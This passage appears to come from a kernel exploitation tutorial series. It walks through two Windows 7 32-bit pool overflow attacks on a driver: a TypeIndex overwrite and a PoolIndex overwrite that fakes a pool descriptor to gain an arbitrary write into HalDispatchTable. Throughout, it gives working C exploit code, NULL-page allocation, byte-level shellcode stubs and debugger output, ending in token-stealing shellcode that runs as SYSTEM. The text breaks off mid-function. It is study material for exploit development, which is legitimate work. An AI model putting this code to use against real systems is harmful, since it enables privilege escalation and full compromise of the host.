   +0x008 InvalidAttributes : 0x100
   +0x00c GenericMapping   : _GENERIC_MAPPING
   +0x01c ValidAccessMask  : 0x1f0003
   +0x020 RetainAccess     : 0
   +0x024 PoolType         : 0 ( NonPagedPool )
   +0x028 DefaultPagedPoolCharge : 0
   +0x02c DefaultNonPagedPoolCharge : 0x40
   +0x030 DumpProcedure    : (null) 
   +0x034 OpenProcedure    : (null) 
   +0x038 CloseProcedure   : (null) 
   +0x03c DeleteProcedure  : (null) 
   +0x040 ParseProcedure   : (null) 
   +0x044 SecurityProcedure : 0x82c68936     long  nt!SeDefaultObjectMethod+0
   +0x048 QueryNameProcedure : (null) 
   +0x04c OkayToCloseProcedure : (null) 

This means functions are being jumped to based on the structure. If we can control one of these we should be able to get the kernel to execute shellcode at an address of our choosing. Looking back at the table you can see that the first entry of the ObTypeIndexTable is a NULL pointer, so if we overwrite the TypeIndex field in the OBJECT_HEADER with 0 then the kernel should try to read the function pointers from the NULL page when it tries to execute them. As we're doing this on Windows 7 32 bit, we can allocate the NULL page and as a consequence control where the kernel's execution jumps to, allowing us to escalate our privileges with the same shellcode I've used previously.
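The effect of changing TypeIndex can be shown with the table values from the dd output earlier. This is only a model: the array is a copy of the 16 entries dumped on my test system (the addresses will differ on yours), and the function names are hypothetical.

```c
#include <stdint.h>

#define SKETCH_TABLE_BASE 0x82b46580u  /* nt!ObTypeIndexTable in the dump above */

/* First 16 entries of ObTypeIndexTable, copied from the dd output. */
static const uint32_t sketch_ob_type_index_table[16] = {
    0x00000000u, 0xbad0b0b0u, 0x841338c8u, 0x84133800u,
    0x84133738u, 0x841334f0u, 0x841b8040u, 0x841b8f78u,
    0x841b8eb0u, 0x841b8de8u, 0x841b8d20u, 0x841b8668u,
    0x841bd440u, 0x841d9f78u, 0x841cd040u, 0x841c7418u,
};

/* Address of the table slot for a given TypeIndex (4 byte pointers). */
uint32_t type_slot_address(uint8_t type_index)
{
    return SKETCH_TABLE_BASE + 4u * type_index;
}

/* Looks up the OBJECT_TYPE pointer for type_index. Returns 1 and stores
   the pointer in *out if the index is within the dumped range, else 0. */
int object_type_for_index(uint8_t type_index, uint32_t *out)
{
    if (type_index >= 16)
        return 0;
    *out = sketch_ob_type_index_table[type_index];
    return 1;
}
```

Index 0xc resolves to 0x841bd440, the Event type shown above, while index 0 resolves to 0x00000000, so every field the kernel reads from the "type" is read from the NULL page.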

So now we want to overwrite the TypeIndex field, leaving every other field between the end of our buffer and the Event object intact. We start by increasing the size of the InBuffer we used before. An extra 0x28 bytes will cover the POOL_HEADER (0x8 bytes), OBJECT_HEADER_QUOTA_INFO (0x10 bytes) and the OBJECT_HEADER up to and including TypeIndex (0x10 bytes).

size_t nInBufferSize = 0x1F8 + 0x28;  
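The offsets used when filling the buffer all follow from the structure sizes listed above. The sketch below just spells out that arithmetic; the macro and function names are mine.

```c
#include <stdint.h>

#define SKETCH_ALLOC_SIZE       0x1F8u  /* driver's pool allocation */
#define SKETCH_POOL_HEADER      0x08u   /* POOL_HEADER of the next chunk */
#define SKETCH_QUOTA_INFO       0x10u   /* OBJECT_HEADER_QUOTA_INFO */
#define SKETCH_TYPEINDEX_OFFSET 0x0Cu   /* TypeIndex within OBJECT_HEADER */

/* Byte offsets into our input buffer at which each structure of the
   following Event object starts. */
uint32_t next_pool_header_offset(void) { return SKETCH_ALLOC_SIZE; }
uint32_t quota_info_offset(void)       { return next_pool_header_offset() + SKETCH_POOL_HEADER; }
uint32_t object_header_offset(void)    { return quota_info_offset() + SKETCH_QUOTA_INFO; }
uint32_t type_index_offset(void)       { return object_header_offset() + SKETCH_TYPEINDEX_OFFSET; }

/* The buffer has to extend to the end of the 4 byte block holding TypeIndex. */
uint32_t overflow_buffer_size(void)    { return type_index_offset() + 4u; }
```

This gives offsets 0x1F8, 0x200, 0x210 and 0x21C for the four structures and fields, and a total buffer size of 0x220, which is the 0x1F8 + 0x28 used above.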

First of all we overwrite the POOL_HEADER and OBJECT_HEADER_QUOTA_INFO structures with their default values as we saw before.

lpInBuffer[0x1F8 / 4] = 0x04080040;  
//dt nt!_POOL_HEADER  
//  + 0x000 PreviousSize : Pos 0, 9 Bits  => 0x40  
//    + 0x000 PoolIndex : Pos 9, 7 Bits => 0x0
//    + 0x002 BlockSize : Pos 0, 9 Bits => 0x40
//    + 0x002 PoolType : Pos 9, 7 Bits => 0x2 (Non-Paged Pool)
//    + 0x000 Ulong1 : Uint4B => 0x04080040 (Just a union field)
lpInBuffer[0x1FC / 4] = 0xee657645;  
//    + 0x004 PoolTag : Uint4B=> 0xee657645 => 'Even'
//    + 0x004 AllocatorBackTraceIndex : Uint2B => 0x7645
//    + 0x006 PoolTagHash : Uint2B => 0xee65

lpInBuffer[0x200 / 4] = 0x00000000;  
// dt nt!_OBJECT_HEADER_QUOTA_INFO
//    + 0x000 PagedPoolCharge  : Uint4B
lpInBuffer[0x204 / 4] = 0x00000040;  
//  + 0x004 NonPagedPoolCharge : Uint4B    
lpInBuffer[0x208 / 4] = 0x00000000;  
//  + 0x008 SecurityDescriptorCharge : Uint4B
lpInBuffer[0x20C / 4] = 0x00000000;  
//  + 0x00c SecurityDescriptorQuotaBlock : Ptr32 Void

Finally we overwrite the OBJECT_HEADER structure, mostly with its default values but with the TypeIndex value set to 0.

//This provides meta data and procedures pointers to keep track of and manage the Object itself
lpInBuffer[0x210 / 4] = 0x00000001;  
//dt nt!_OBJECT_HEADER
//    + 0x000 PointerCount     : Int4B => 1, one active pointer to the object
lpInBuffer[0x214 / 4] = 0x00000001;  
//  + 0x004 HandleCount : Int4B => 1, one active handle to the object
//    + 0x004 NextToFree : Ptr32 Void => Unused on an allocated object
lpInBuffer[0x218 / 4] = 0x00000000;  
//  + 0x008 Lock : _EX_PUSH_LOCK => NULL, 
//Interesting note from codemachine: On older version of Windows, the object manager attempted to acquire an object type specific lock (OBJECT_TYPE->TypeLock) before performing an operation on an object. This implied that no other object of that type in the entire system could be manipulated for the duration the object type lock was held.
lpInBuffer[0x21C / 4] = 0x00080000;  
//  + 0x00c TypeIndex : UChar => 0x00 - This is the only field we corrupt, normally for an event object on Win7SP1 this would be 0xC
//    + 0x00d TraceFlags : UChar => 0x00
//    + 0x00e InfoMask : UChar => 0x08
//    + 0x00f Flags : UChar => 0x00

//We only wanted to modify the TypeIndex field above, so we stop before overwriting the rest of the structure. For completeness' sake its remaining fields are:
//  + 0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
//    + 0x010 QuotaBlockCharged : Ptr32 Void
//    + 0x014 SecurityDescriptor : Ptr32 Void
//    + 0x018 Body : _QUAD
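
The last dword we write packs four single byte fields together, so it's worth seeing how 0x00080000 comes about. The sketch below assumes the little-endian layout shown in the comments above; both function names are hypothetical helpers I've added for illustration.

```c
#include <assert.h>
#include <stdint.h>

/* Packs the four UChar fields at offset 0x00c of a 32-bit _OBJECT_HEADER into
 * the little-endian dword that ends up at lpInBuffer[0x21C / 4]. */
uint32_t pack_object_header_bytes(uint8_t type_index, uint8_t trace_flags,
                                  uint8_t info_mask, uint8_t flags)
{
    return (uint32_t)type_index
         | ((uint32_t)trace_flags << 8)
         | ((uint32_t)info_mask << 16)
         | ((uint32_t)flags << 24);
}

/* lpInBuffer is an array of 4-byte values, so a byte offset into the
 * overflow has to be divided by 4 to get the array index. */
uint32_t dword_index(uint32_t byte_offset)
{
    assert(byte_offset % 4 == 0);
    return byte_offset / 4;
}
```

With TypeIndex 0x00 and InfoMask 0x08 this produces 0x00080000, whereas an untouched Event object (TypeIndex 0xC) would give 0x0008000C.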

Now let's run the code (making sure Special Pool has been disabled) and we should get a crash with the kernel trying to access the OBJECT_TYPE structure at address 0x0. I immediately got a BugCheck in my attached debugger, and looking at the faulting instruction and the registers at the time of the exception we see exactly what we hoped for.

r  
eax=a5173e38 ebx=00000000 ecx=00000000 edx=85911dd0 esi=85911dd0 edi=84d9a8f0  
eip=82c4835d esp=9779bba0 ebp=9779bbdc iopl=0         nv up ei ng nz na po nc  
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010282  
nt!ObpCloseHandleTableEntry+0x28:  
82c4835d 837b7400        cmp     dword ptr [ebx+74h],0 ds:0023:00000074=????????  

A function called ObpCloseHandleTableEntry is faulting whilst trying to read memory from ebx+0x74, with ebx being 0. This corresponds to the OkayToCloseProcedure entry in the OBJECT_TYPE structure (TypeInfo starts at offset 0x28 and OkayToCloseProcedure sits at 0x4c within it), being read from the NULL page as planned. Now we just need to allocate the NULL page, using the same method as before in this series, and set one of the function pointer offsets to point at our token stealing shellcode.

The following code was added at the start of main to allocate the NULL page.

HMODULE hNtdll = GetModuleHandle("ntdll.dll");

if (hNtdll == NULL) { //GetModuleHandle returns NULL on failure, not INVALID_HANDLE_VALUE
    printf("Could not open handle to ntdll. \n");
    CloseHandle(hDriver);
    return 1;
}

//Get address of NtAllocateVirtualMemory from the dynamically linked library and then cast it to a callable function type
PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");

if (!NtAllocateVirtualMemory) {  
    printf("Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());
    return 1;
}

//We can't outright pass NULL as the address but if we pass 1 then it gets rounded down to 0...
PVOID baseAddress = (PVOID)0x1;  
SIZE_T regionSize = 0x2000; //Probably enough, it will get rounded up to the next page size  
                                // Map the null page
NTSTATUS ntStatus = NtAllocateVirtualMemory(  
    GetCurrentProcess(), //Current process handle
    &baseAddress, //address we want our memory to start at, will get rounded down to the nearest page boundary
    0, //ZeroBits: the number of high-order address bits that must be zero in the base address, only used when the system chooses the address so 0 is fine here
    &regionSize, //Required size - will be modified to actual size allocated, is rounded up to the next page boundary
    MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, //claim memory straight away, get highest appropriate address
    PAGE_EXECUTE_READWRITE //All permissions
);

if (ntStatus != 0) {  
    printf("Virtual Memory Allocation Failed: 0x%x\n", ntStatus);
    return 1;
}

printf("Address allocated at: 0x%p\n", baseAddress);  
printf("Allocated memory size: 0x%X\n", regionSize);  

With the NULL page successfully allocated we just need to put a pointer to our shellcode in place of one of the function pointers. I tried placing a shellcode pointer at the offset of each function and found that the Delete, OkayToClose and Close procedures would all lead to the shellcode being executed in a straightforward way. I decided to overwrite the Delete procedure as b33f used OkayToClose and Ashfaq used Close.

*(PULONG)0x64 = (ULONG) &TokenStealingShellcodeWin7Generic; 
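
To see where 0x64 comes from, the offsets can be rebuilt from the structure layouts. The sketch below is my own mirror of what I believe the Windows 7 SP1 x86 layout of OBJECT_TYPE and its embedded OBJECT_TYPE_INITIALIZER to be, with every pointer modelled as a 32-bit value. The struct and macro names are made up for illustration, so treat the layout as an assumption and check it against dt nt!_OBJECT_TYPE on your own target.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Assumed Win7 SP1 x86 layout; pointers are modelled as uint32_t so the
 * offsets stay the same when this is compiled on a 64-bit host. */
typedef struct {
    uint32_t Leading[12];           /* 0x00-0x2f: Length .. DefaultNonPagedPoolCharge */
    uint32_t DumpProcedure;         /* 0x30 */
    uint32_t OpenProcedure;         /* 0x34 */
    uint32_t CloseProcedure;        /* 0x38 */
    uint32_t DeleteProcedure;       /* 0x3c */
    uint32_t ParseProcedure;        /* 0x40 */
    uint32_t SecurityProcedure;     /* 0x44 */
    uint32_t QueryNameProcedure;    /* 0x48 */
    uint32_t OkayToCloseProcedure;  /* 0x4c */
} OBJECT_TYPE_INITIALIZER32;

typedef struct {
    uint32_t Leading[10];               /* 0x00-0x27: TypeList .. HighWaterNumberOfHandles */
    OBJECT_TYPE_INITIALIZER32 TypeInfo; /* 0x28 */
} OBJECT_TYPE32;

static_assert(sizeof(OBJECT_TYPE_INITIALIZER32) == 0x50, "unexpected padding");

/* Offset of a procedure pointer from the start of the OBJECT_TYPE, which is
 * also its absolute address once the structure is read from the NULL page. */
#define PROC_OFFSET(field) \
    ((uint32_t)(offsetof(OBJECT_TYPE32, TypeInfo) + \
                offsetof(OBJECT_TYPE_INITIALIZER32, field)))
```

Under that assumed layout PROC_OFFSET(CloseProcedure) is 0x60, PROC_OFFSET(DeleteProcedure) is 0x64 and PROC_OFFSET(OkayToCloseProcedure) is 0x74, which lines up with the read from 0x74 we saw in the crash.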

Next we need to slightly modify the shellcode, as the Delete procedure expects a 4 byte argument which needs to be removed from the stack to avoid things getting unstable. Just adding ret 4; to the end of the shellcode fixes it. Finally we add a nice system("calc.exe"); before we start tidying up memory. Now we run the code again and should get a nice calculator running as SYSTEM as shown below.

The final/full code for the exploit is on Github.

Pool Overflow exploitation round 2

The second technique I'm going to use to exploit this vulnerability is the PoolIndex overwrite, which is described in Kernel Pool Exploitation on Windows 7 and demonstrated with example code in First Dip Into the Kernel Pool : MS10-058.

This time we'll only be overwriting the POOL_HEADER structure of the neighboring Event object, so our in buffer can be smaller.

size_t nInBufferSize = 0x1FC;  

The field we're going to overwrite is the PoolIndex field. By default a Windows 7 host will only have one Nonpaged pool, which means this field won't actually be used for Nonpaged allocations. So first of all we'll overwrite the PoolType field to make the block look like it's part of the Paged Pool. As we saw earlier the value needed in the field can be found in the POOL_TYPE enum and ends up being 3.

PagedPool, NonPagedPoolMustSucceed = NonPagedPool + 2  

The PoolIndex field is used to index into the nt!ExpPagedPoolDescriptor array to find the correct PoolDescriptor for an object when it is free'd. Looking at the array in windbg we see the following.

dd nt!ExpPagedPoolDescriptor  
82ba7018  8432c000 8432d140 8432e280 8432f3c0  
82ba7028  84330500 00000000 00000000 00000000  
82ba7038  00000000 00000000 00000000 00000000  

You'll notice only the first five entries are valid pointers with the rest being NULL. That means if we overwrite the POOL_HEADER's PoolIndex field with a value greater than or equal to 5, when the object is free'd the kernel will try to reference a POOL_DESCRIPTOR starting at the NULL page. As before we can allocate the NULL page from user land and set the structure's values in such a way that we can gain code execution. First of all let's overwrite the PoolIndex field and make sure the kernel crashes as expected.

lpInBuffer[0x1F8 / 4] = 0x06080a40;

//dt nt!_POOL_HEADER  
//  + 0x000 PreviousSize : Pos 0, 9 Bits  => 0x40  
//    + 0x000 PoolIndex : Pos 9, 7 Bits => 0x5 //Out of bounds
//    + 0x002 BlockSize : Pos 0, 9 Bits => 0x8
//    + 0x002 PoolType : Pos 9, 7 Bits => 0x3 //Paged Pool
//    + 0x000 Ulong1 : Uint4B => 0x06080a40 (Just a union field)
//We stop overwriting after the first 4 bytes and leave the rest as default
//    + 0x004 PoolTag : Uint4B=> 0xee657645 => 'Even'
//    + 0x004 AllocatorBackTraceIndex : Uint2B => 0x7645
//    + 0x006 PoolTagHash : Uint2B => 0xee65
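
Going the other way, here's a rough sketch of how the corrupted header ends up selecting a NULL descriptor. It decodes Ulong1 using the same 32-bit bit positions as the dt output and then indexes a snapshot of the nt!ExpPagedPoolDescriptor dump from above. The addresses are specific to that boot and the function names are hypothetical; the real lookup happens inside ExFreePoolWithTag.

```c
#include <assert.h>
#include <stdint.h>

typedef struct {
    uint32_t previous_size;
    uint32_t pool_index;
    uint32_t block_size;
    uint32_t pool_type;
} pool_header_fields;

/* Splits Ulong1 back into its four bit fields. */
pool_header_fields decode_pool_header_ulong1(uint32_t ulong1)
{
    pool_header_fields f;
    f.previous_size = ulong1 & 0x1ff;
    f.pool_index    = (ulong1 >> 9) & 0x7f;
    f.block_size    = (ulong1 >> 16) & 0x1ff;
    f.pool_type     = (ulong1 >> 25) & 0x7f;
    return f;
}

/* Snapshot of the first 12 dwords shown by dd nt!ExpPagedPoolDescriptor. */
static const uint32_t paged_pool_descriptors[12] = {
    0x8432c000, 0x8432d140, 0x8432e280, 0x8432f3c0,
    0x84330500, 0x00000000, 0x00000000, 0x00000000,
    0x00000000, 0x00000000, 0x00000000, 0x00000000
};

/* Simplified model of the descriptor lookup performed on free. */
uint32_t descriptor_for_header(uint32_t ulong1)
{
    pool_header_fields f = decode_pool_header_ulong1(ulong1);
    assert(f.pool_index < 12); /* only the dumped entries are modelled */
    return paged_pool_descriptors[f.pool_index];
}
```

For 0x06080a40 the decoded PoolIndex is 5, so the modelled lookup returns 0 and the kernel is left treating the NULL page as a POOL_DESCRIPTOR.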

Now compiling and running the binary we get a crash.

Access violation - code c0000005 (!!! second chance !!!)  
nt!ExFreePoolWithTag+0x814:  
82b5f2cf 8b9380000000    mov     edx,dword ptr [ebx+80h]  
kd> r  
eax=00000008 ebx=00000000 ecx=82b68d20 edx=00000000 esi=000001ff edi=8455f830  
eip=82b5f2cf esp=9610fae8 ebp=9610fb44 iopl=0         nv up ei pl zr na pe nc  
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246  
nt!ExFreePoolWithTag+0x814:  
82b5f2cf 8b9380000000    mov     edx,dword ptr [ebx+80h] ds:0023:00000080=????????  

The kernel successfully crashed trying to access memory at an address of 0x0 + 0x80 while freeing a pool allocation. Now how do we go from controlling a Pool Descriptor to code execution?

As covered earlier in this article, on Windows 7 the Pool Descriptor includes a PendingFrees list whose entries are free'd once it contains 32 or more of them. By faking a Pool Descriptor we can make the PendingFrees list point to fake pool allocations which we control, and if we set PendingFreeDepth to 32 or more the kernel will attempt to free them. Each free'd block is then linked into the ListHeads list. By creating fake ListHeads entries that point at an address we want to overwrite, the address of the fake block that has just been free'd will be written to the Blink field of the first entry in that list, which is the address we chose.

This allows us to write a controlled user mode address to any address in memory. For now let's get the kernel writing the fake object address to 0x41414141.
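
The write itself is just an ordinary linked list insertion being fed a list head we control. Below is a simplified model of that step, using a small emulated 32-bit address space so it can run anywhere. It assumes the free'd block is linked in at the head of the list, and all of the names are mine rather than anything from the kernel or the exploit.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MEM_SIZE 0x2000u
static uint8_t mem[MEM_SIZE]; /* emulated memory, addresses are offsets */

uint32_t read32(uint32_t addr)
{
    uint32_t v;
    assert(addr <= MEM_SIZE - 4);
    memcpy(&v, &mem[addr], 4);
    return v;
}

void write32(uint32_t addr, uint32_t v)
{
    assert(addr <= MEM_SIZE - 4);
    memcpy(&mem[addr], &v, 4);
}

/* Head insertion on a 32-bit _LIST_ENTRY { Flink at +0, Blink at +4 }. */
void insert_head(uint32_t head, uint32_t entry)
{
    uint32_t first = read32(head); /* head->Flink, attacker controlled */
    write32(entry, first);         /* entry->Flink = first */
    write32(entry + 4, head);      /* entry->Blink = head */
    write32(first + 4, entry);     /* first->Blink = entry, the useful write */
    write32(head, entry);          /* head->Flink = entry */
}

/* Fakes one ListHeads entry at 0x140, frees the block at 0x1208 and
 * returns whatever ended up at the chosen target address. */
uint32_t demo_write(uint32_t where)
{
    memset(mem, 0, sizeof mem);
    write32(0x140, where - 4);
    insert_head(0x140, 0x1208);
    return read32(where);
}
```

Because the fake Flink is where - 4, the Blink write at offset +4 lands exactly on where, so demo_write(0x1800) returns 0x1208.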

Hopefully some code will make this clearer. All of this code is placed before the pool spraying code.

First we allocate the NULL page as before.

HMODULE hNtdll = GetModuleHandle("ntdll.dll");

if (hNtdll == NULL) { //GetModuleHandle returns NULL on failure, not INVALID_HANDLE_VALUE
    printf("Could not open handle to ntdll. \n");
    CloseHandle(hDriver);
    return 1;
}

//Get address of NtAllocateVirtualMemory from the dynamically linked library and then cast it to a callable function type
PNtAllocateVirtualMemory NtAllocateVirtualMemory = (PNtAllocateVirtualMemory)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");

if (!NtAllocateVirtualMemory) {  
    printf("Failed Resolving NtAllocateVirtualMemory: 0x%X\n", GetLastError());
    return 1;
}

//We can't outright pass NULL as the address but if we pass 1 then it gets rounded down to 0...
PVOID baseAddress = (PVOID)0x1;  
SIZE_T regionSize = 0x2500; //Probably enough, it will get rounded up to the next page size  
                                // Map the null page
NTSTATUS ntStatus = NtAllocateVirtualMemory(  
    GetCurrentProcess(), //Current process handle
    &baseAddress, //address we want our memory to start at, will get rounded down to the nearest page boundary
    0, //ZeroBits: the number of high-order address bits that must be zero in the base address, only used when the system chooses the address so 0 is fine here
    &regionSize, //Required size - will be modified to actual size allocated, is rounded up to the next page boundary
    MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN, //claim memory straight away, get highest appropriate address
    PAGE_EXECUTE_READWRITE //All permissions
);

if (ntStatus != 0) {  
    printf("Virtual Memory Allocation Failed: 0x%x\n", ntStatus);
    return 1;
}

printf("Address allocated at: 0x%p\n", baseAddress);

printf("Allocated memory size: 0x%X\n", regionSize);  

Now we need to create the fake POOL_DESCRIPTOR structure starting at 0x0. I basically worked out how to do this by working backwards from Jeremy's solution, so I've just used his values here.

RtlZeroMemory((PCHAR)0x0, 0x1300);

//dt - r nt!_POOL_DESCRIPTOR    
*(PCHAR)0x0 = 1;
//+ 0x000 PoolType         : PagedPool = 0n1
*(PCHAR)0x4 = 1;
//+0x004 PagedLock        : _KGUARDED_MUTEX
*(PCHAR*)0x100 = (PCHAR)0x1208;
//+ 0x100 PendingFrees : 0x1208 //This address will be written to the targeted 'where' address

*(PCHAR*)0x104 = (PCHAR)0x20;
//+0x104 PendingFreeDepth : 0x20 - the pending free depth needs to be at least 32 so that ExFreePoolWithTag actually frees everything

//'where' is the address we want written to, 0x41414141 for this first test
for (unsigned int i = 0x140; i < 0x1140; i += 8) {  
    *(PCHAR*)i = (PCHAR)where - 4;
}
//+0x140 ListHeads : [512] _LIST_ENTRY
    //+ 0x000 Flink : (PCHAR)0x41414141 - 4
    //+ 0x004 Blink : left as 0 by the RtlZeroMemory call, the loop above only writes Flink
    //And repeat...
//The address of the object on the PendingFrees list, which is currently 0x1208, will be written to 0x41414141 when it is linked into the front of the list

Finally we create the fake block at 0x1208, the corresponding POOL_HEADER needs to be at 0x1200.

*(PINT)0x1200 = (INT)0x060c0a00;
*(PINT)0x1204 = (INT)0x6f6f6f6f;
//dt nt!_POOL_HEADER 0x1200
//+0x000 PreviousSize     : 0y000000000(0)
//    + 0x000 PoolIndex : 0y0000101(0x5)
//    + 0x002 BlockSize : 0y000001100(0xc)
//    + 0x002 PoolType : 0y0000011(0x3)
//    + 0x000 Ulong1 : 0x60c0a00
//    + 0x004 PoolTag : 0x6f6f6f6f
//    + 0x004 AllocatorBackTraceIndex : 0x6f6f
//    + 0x006 PoolTagHash : 0x6f6f
*(PCHAR*)0x1208 = (PCHAR)0x0; //next pointer

Because the memory at 0x1208 holds a NULL pointer, ExDeferredFreePool will free this block and then stop, as there is no following entry.

We'll also need to create another fake POOL_HEADER immediately after the object to be free'd, because when the memory manager frees a block it validates that the block's size is equal to the next block's PreviousSize field.

*(PINT)0x1260 = (INT)0x060c0a0c;
*(PINT)0x1264 = (INT)0x6f6f6f6f;
//dt nt!_POOL_HEADER 0x1260
//+0x000 PreviousSize     : 0y000001100(0xc)
//    + 0x000 PoolIndex : 0y0000101(0x5)
//    + 0x002 BlockSize : 0y000001100(0xc)
//    + 0x002 PoolType : 0y0000011(0x3)
//    + 0x000 Ulong1 : 0x60c0a0c
//    + 0x004 PoolTag : 0x6f6f6f6f
//    + 0x004 AllocatorBackTraceIndex : 0x6f6f
//    + 0x006 PoolTagHash : 0x6f6f
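
The 0x1260 address isn't arbitrary, it falls straight out of the BlockSize in the first fake header. Here's a minimal sketch of that arithmetic and of the size check described above, assuming the 8 byte pool granularity of a 32-bit system; the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define POOL_GRANULARITY 8u /* BlockSize counts 8-byte units on x86 */

/* Address of the POOL_HEADER that follows a block of block_size units. */
uint32_t next_pool_header(uint32_t header_addr, uint32_t block_size)
{
    assert(block_size > 0 && block_size < 0x200); /* 9-bit field */
    return header_addr + block_size * POOL_GRANULARITY;
}

/* Simplified model of the check: this block's BlockSize has to match the
 * PreviousSize recorded in the header that follows it. */
int headers_consistent(uint32_t this_ulong1, uint32_t next_ulong1)
{
    uint32_t block_size = (this_ulong1 >> 16) & 0x1ff;
    uint32_t next_previous_size = next_ulong1 & 0x1ff;
    return block_size == next_previous_size;
}
```

With a BlockSize of 0xc the block starting at 0x1200 is 0x60 bytes long, so next_pool_header(0x1200, 0xc) is 0x1260, and headers_consistent(0x060c0a00, 0x060c0a0c) holds.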

Now building and running the code, we get the error we expected.

Access violation - code c0000005 (!!! second chance !!!)  
nt!ExDeferredFreePool+0x2e3:  
82b60943 894604          mov     dword ptr [esi+4],eax  
kd> r  
eax=00001208 ebx=000001ff ecx=000001ff edx=00000198 esi=4141413d edi=00000000  
eip=82b60943 esp=a287faa0 ebp=a287fad8 iopl=0         nv up ei pl nz na po nc  
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010202  
nt!ExDeferredFreePool+0x2e3:  
82b60943 894604          mov     dword ptr [esi+4],eax ds:0023:41414141=????????  

Here we can see 0x1208 being written by ExDeferredFreePool to [esi+4], which is equal to 0x41414141. Now we need to overwrite something in memory which will allow us to gain code execution. For this I chose to overwrite an entry in the HalDispatchTable, as I did when exploiting the arbitrary overwrite vulnerability.

Once the entry has been overwritten, triggering the correct function will cause the dispatch table entry to be used and the kernel's execution to be redirected to where the fake pool allocation previously was (0x1208).

First of all we need to find the HalDispatchTable address and the targeted entry we want to overwrite, in this case the second entry, which is used when the NtQueryIntervalProfile function in ntdll is called.

PNtQuerySystemInformation query = (PNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");  
if (query == NULL) {  
    printf("GetProcAddress() failed.\n");
    return 1;
}
ULONG len = 0;  
query(SystemModuleInformation, NULL, 0, &len);  
PSYSTEM_MODULE_INFORMATION pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len);  
if (pModuleInfo == NULL) {  
    printf("Could not allocate memory for module info.\n");
    return 1;
}
query(SystemModuleInformation, pModuleInfo, len, &len);  
if (len == 0) {  
    printf("Failed to retrieve system module information\n");
    return 1;
}
PVOID kernelImageBase = pModuleInfo->Modules[0].ImageBaseAddress;  
PCHAR kernelImage = (PCHAR)pModuleInfo->Modules[0].Name;  
kernelImage = strrchr(kernelImage, '\\') + 1;  
printf("Kernel Image Base 0x%X\n", kernelImageBase);  
printf("Kernel Image name %s\n", kernelImage);

HMODULE userBase = LoadLibrary(kernelImage);  
PVOID dispatch = (PVOID)GetProcAddress(userBase, "HalDispatchTable");  
dispatch = (PVOID)((ULONG)dispatch - (ULONG)userBase + (ULONG)kernelImageBase);  
printf("User Mode kernel image base address: 0x%X\n", userBase);  
printf("Kernel mode kernel image base address: 0x%X\n", kernelImageBase);  
printf("HalDispatchTable address: 0x%X\n", dispatch);

ULONG where = (ULONG)((ULONG)dispatch + sizeof(PVOID));  
printf("write address: 0x%X\n", where);  
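
The address fix-up in the middle of that code is easy to get wrong, so here it is in isolation. This is only a sketch with 32-bit values and hypothetical function names: the symbol's offset inside the user mode copy of the kernel image is the same as its offset inside the real kernel, so we subtract one base and add the other.

```c
#include <assert.h>
#include <stdint.h>

/* Translates the address of an export found in the user mode mapping of
 * the kernel image into its address in the running kernel. */
uint32_t rebase_to_kernel(uint32_t user_symbol, uint32_t user_base,
                          uint32_t kernel_base)
{
    assert(user_symbol >= user_base);
    return user_symbol - user_base + kernel_base;
}

/* The second HalDispatchTable entry, sizeof(PVOID) is 4 on x86. */
uint32_t hal_dispatch_second_entry(uint32_t hal_dispatch_table)
{
    return hal_dispatch_table + 4;
}
```

As a made-up example, a symbol at 0x0052a3f8 in an image loaded at 0x00400000, with the kernel based at 0x82a11000, rebases to 0x82b3b3f8, making the write target 0x82b3b3fc. The real values change every boot.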

Next we update the fake ListHeads entries to point at where.

for (unsigned int i = 0x140; i < 0x1140; i += 8) {  
    *(PCHAR*)i = (PCHAR)where - 4;
}
    //+0x140 ListHeads : [512] _LIST_ENTRY
        //+ 0x000 Flink : (PCHAR)where - 4
        //+ 0x004 Blink : left as 0, the loop above only writes Flink
        //And repeat...

Finally we place a 0xcc byte (the int 3 opcode) at 0x1208 to trigger a breakpoint, and add a call to NtQueryIntervalProfile once we've cleaned everything up so that the overwritten dispatch table entry gets used. The reason for the 0xCC byte is that otherwise the bytes at 0x1208 are the opcodes for clc (0xf8) followed by ret (0xc3), which means nothing really happens and the OS continues fine.

printf("triggering payload\r\n");  
NtQueryIntervalProfile_t NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtdll, "NtQueryIntervalProfile");

if (!NtQueryIntervalProfile) {  
    printf("Failed Resolving NtQueryIntervalProfile. \n");
    return 1;
}
printf("Triggering shellcode\n");  
ULONG interval = 1;  
NtQueryIntervalProfile(2, &interval);  

We still haven't set up our shellcode but we should now have code execution at 0x1208. Running the code again we get exactly that!

The final step is to set up the shellcode. Execution will literally start at 0x1208 so we can't just put a pointer there. Instead we set up the following data, just before calling NtQueryIntervalProfile.

/*00001208 b8ADDRESS      mov     eax, what
0000120d ffd0            call    eax  
0000120f c9              leave  
00001210 c3              ret*/  
*(PUCHAR)0x1208 = 0xb8;
*(PINT)0x1209 = (ULONG)&TokenStealingShellcodeWin7Generic;
*(PUCHAR)0x120D = 0xff;
*(PUCHAR)0x120E = 0xd0;
*(PUCHAR)0x120F = 0xc9;
*(PUCHAR)0x1210 = 0xc3;
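
If you'd rather not poke the bytes in one at a time, the same trampoline can be assembled into a buffer first. This is just a sketch of the encoding used above (mov eax, imm32 / call eax / leave / ret); build_call_stub is a hypothetical helper and it doesn't copy anything to the NULL page itself.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STUB_SIZE 9u /* covers 0x1208 through 0x1210 inclusive */

/* Writes the 9-byte stub into out and returns its length. target is the
 * 32-bit address the stub should call. */
size_t build_call_stub(uint8_t *out, size_t out_len, uint32_t target)
{
    assert(out != NULL && out_len >= STUB_SIZE);
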